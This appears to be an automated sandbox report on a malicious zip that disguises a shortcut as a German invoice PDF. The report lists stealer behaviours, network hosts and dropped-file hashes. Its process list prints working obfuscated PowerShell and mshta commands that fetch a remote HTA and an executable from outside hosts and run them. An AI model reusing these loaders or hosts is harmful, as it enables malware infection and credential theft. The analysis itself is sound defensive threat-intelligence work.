Analysis Overview
SHA256
649ecc1223387e9422fd9c19ace2c3624a422f06c42fcd7697ff03036c3b7120
Threat Level: Known bad
The file 649ecc1223387e9422fd9c19ace2c3624a422f06c42fcd7697ff03036c3b7120.zip was found to be: Known bad.
Malicious Activity Summary
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Reads user/profile data of web browsers
Reads WinSCP keys stored on the system
Loads dropped DLL
Executes dropped EXE
Accesses Microsoft Outlook profiles
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
outlook_office_path
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 20:00
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win10v2004-20241007-en
Max time kernel
118s
Max time network
135s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4744 set thread context of 840 | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | C:\Windows\SysWOW64\cmd.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0091.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
"C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe
"C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe
"C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe"
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 235.0.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirnisirlo.online | udp |
| US | 104.21.35.62:443 | sirnisirlo.online | tcp |
| US | 8.8.8.8:53 | 62.35.21.104.in-addr.arpa | udp |
Files
memory/736-2-0x00007FFB0A403000-0x00007FFB0A405000-memory.dmp
memory/736-8-0x0000019D7AF50000-0x0000019D7AF72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k0fdvpxm.z35.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/736-13-0x00007FFB0A400000-0x00007FFB0AEC1000-memory.dmp
memory/736-14-0x00007FFB0A400000-0x00007FFB0AEC1000-memory.dmp
memory/736-17-0x00007FFB0A400000-0x00007FFB0AEC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75b4b2eecda41cec059c973abb1114c0 |
| SHA1 | 11dadf4817ead21b0340ce529ee9bbd7f0422668 |
| SHA256 | 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134 |
| SHA512 | 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626 |
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
| MD5 | b6ab13b3b9903bf84327737ba227bab3 |
| SHA1 | 65dff8665b502ba33f3effb8430263e4f906c1c0 |
| SHA256 | baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6 |
| SHA512 | 6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7 |
C:\Windows\Temp\{83FAC4A9-E795-470B-84F9-352356534D2B}\.cr\EXBRRVQT.exe
| MD5 | eb26dfa5e4e3170d90b5629df0715aa9 |
| SHA1 | bbc10367aa29aa36a6e53c63b60a6936bc6f1720 |
| SHA256 | 70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906 |
| SHA512 | 11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Helicoid.dll
| MD5 | a9c5977784daf8cebe8408a8b6db3fbe |
| SHA1 | 8ae8d67007cdca9acf96681ffa6200e5847972de |
| SHA256 | 63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad |
| SHA512 | 886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\ActiveISO.exe
| MD5 | b84dfabe933d1160f624693d94779ce5 |
| SHA1 | ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f |
| SHA256 | 588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd |
| SHA512 | eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\vcruntime140_1.dll
| MD5 | 75e78e4bf561031d39f86143753400ff |
| SHA1 | 324c2a99e39f8992459495182677e91656a05206 |
| SHA256 | 1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e |
| SHA512 | ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/1020-90-0x00007FFB09AD0000-0x00007FFB0A01E000-memory.dmp
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\msvcp140.dll
| MD5 | 7db24201efea565d930b7ec3306f4308 |
| SHA1 | 880c8034b1655597d0eebe056719a6f79b60e03c |
| SHA256 | 72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e |
| SHA512 | bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5Core.dll
| MD5 | 8c735052a2d4e9b01b0e028f0c20f67c |
| SHA1 | b72bde11de3310a495dd16520362f4adbf21717a |
| SHA256 | d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7 |
| SHA512 | 0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5Network.dll
| MD5 | fe5ed4c5da03077f98c3efa91ecefd81 |
| SHA1 | e23e839ec0602662788f761ebe7dd4b39c018a7f |
| SHA256 | d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b |
| SHA512 | 22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5Gui.dll
| MD5 | 34893cb3d9a2250f0edecd68aedb72c7 |
| SHA1 | 37161412df2c1313a54749fe6f33e4dbf41d128a |
| SHA256 | ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34 |
| SHA512 | 484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5Widgets.dll
| MD5 | c502bb8a4a7dc3724ab09292cd3c70d6 |
| SHA1 | ff44fddeec2d335ec0eaa861714b561f899675fd |
| SHA256 | 4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d |
| SHA512 | 73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\Qt5PrintSupport.dll
| MD5 | d0634933db2745397a603d5976bee8e7 |
| SHA1 | ddec98433bcfec1d9e38557d803bc73e1ff883b6 |
| SHA256 | 7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1 |
| SHA512 | 9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\StarBurn.dll
| MD5 | 41e19ba2364f2c834b2487e1d02bb99a |
| SHA1 | 6c61d603dddfe384a93ad33775b70681d0a396d9 |
| SHA256 | c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340 |
| SHA512 | 6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\vechpt
| MD5 | dd899ca13e5bef55bcea07e167da891b |
| SHA1 | e883f0240f127520486f063b033fb34fa2dfe5c1 |
| SHA256 | a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7 |
| SHA512 | e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06 |
C:\Windows\Temp\{A92C9D02-7AA9-4FD1-8BEB-EC3476F9CACC}\.ba\dcfa
| MD5 | 456596683dad1217c76d8c0f47b5cfbc |
| SHA1 | 001ae3f937aa75ad2175289c6e8f09561a1cbb35 |
| SHA256 | a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f |
| SHA512 | 537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591 |
memory/1020-93-0x00007FFB08BD0000-0x00007FFB08D42000-memory.dmp
memory/4744-130-0x00007FFB09AD0000-0x00007FFB0A01E000-memory.dmp
memory/4744-133-0x00007FFB08BD0000-0x00007FFB08D42000-memory.dmp
memory/4744-134-0x00007FFB08BD0000-0x00007FFB08D42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3418b113
| MD5 | 594bdb7f70b7569640c67fd25095887c |
| SHA1 | cde397ffe041cac0d2a3430813d647cb15892f9b |
| SHA256 | 69d0bfb2d7b96c429366b6060dda881299d780a54249922990d745e3bdfdab21 |
| SHA512 | c9839fc20d3a98f004bcfaa0b8a84809a133b697682146a76d225a88a6cef2cdd31dcdd90312ffd77ff70fb506be758eb3feb994c441d490a09504ef17edf78d |
memory/840-137-0x00007FFB286B0000-0x00007FFB288A5000-memory.dmp
memory/840-140-0x0000000074D80000-0x0000000074EFB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
memory/3468-147-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-148-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-150-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-155-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-156-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
memory/3468-161-0x00007FF6E9750000-0x00007FF6E9A36000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win7-20241023-en
Max time kernel
120s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\system32\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0092.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
